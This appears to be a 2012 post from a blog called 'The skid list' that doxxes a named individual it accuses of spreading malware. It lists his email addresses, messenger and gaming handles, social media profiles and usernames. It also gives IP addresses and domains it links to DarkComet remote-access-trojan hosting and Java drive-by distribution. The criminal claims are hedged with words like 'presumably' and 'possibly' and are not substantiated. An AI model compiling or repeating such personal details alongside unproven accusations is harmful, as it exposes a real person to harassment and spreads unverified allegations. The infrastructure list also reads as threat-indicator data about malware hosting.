216.38.2.217 [utilities.3utilities.com] - VPS of some sort, used as a proxy (Provider: GigeNET)
216.38.8.176 [artemishost.no-ip.biz] - Another VPS, some malware he spreads connects back here; also has some recorded bitcoin transactions (Provider: GigeNET)
67.215.9.235 [apocalypsefree.in] - DarkComet hosting
91.236.116.105 [apocalypsefree.in] - DarkComet hosting
216.38.7.236 - no-ip.org DarkComet
184.82.139.23 - no-ip.org DarkComet
46.37.186.66 - no-ip.org DarkComet

Emails:

itsnickmoses@gmail.com
daily.middleman@gmail.com
dailydaily500@yahoo.com
black_daily500@yahoo.com
black_daily500@hotmail.com

MSN: dailyamcry@hotmail.com
AIM: dailydaily500
Skype: itsnickmoses
XBL: Daily500


Facebook: https://www.facebook.com/nickmoses
Archived Facebook info: http://profileengine.com/people/nickmoses/nick.moses

Google+: https://plus.google.com/104296121370055224470/
Myspace: http://www.myspace.com/coolmoses
Photobucket: http://s576.photobucket.com/profile/daily500
Formspring: http://www.formspring.me/itsnickmoses
Steam: http://steamcommunity.com/id/itsmemoses
Xfire: http://beta.xfire.com/profile/dailydaily500/
DeviantArt (lol): http://daily500.deviantart.com
Ebay: http://myworld.ebay.com/dailydaily500/
Chess.com: http://www.chess.com/members/view/daily500
Runescape Username: dailymage

Profiles owned by him presumably used for stalking or deception, possibly hacked accounts:

https://www.facebook.com/beth.davis.7712
http://www.myspace.com/242729140
http://www.myspace.com/330598988
http://www.bebo.com/PleaseSignIn.jsp?Page=c/profile&MemberId=1863201824


All usernames:

nickmoses
itsnickmoses
itsmemoses
Daily
daily500
dailydaily500
dailymage


Domains:

apocalypsefree.in
doomzco.com
slackforum.com
nickmoses.net
mosesmusic.net
dudeitscool.net
dudeitshosting.net
pagemake.org (Java drivebys)
teengirlslive.us (used for spreading Java drivebys, Google it and you'll see tons of 4chan threads)
teencamlive.net (spreading)
teencamzlive.us (spreading)
photos-at-90.org (expired)  

Nick Moses, hacker extraordinaire


what I don't even

Monday, April 30, 2012

The skid list

This site's purpose is to publish information related to all sorts of script kiddies ("skids"). Trojan spreaders, botnet handlers, and more. Skids, their servers, their websites, their domains, their networks, and their facilitators are all fair game.

Stay tuned.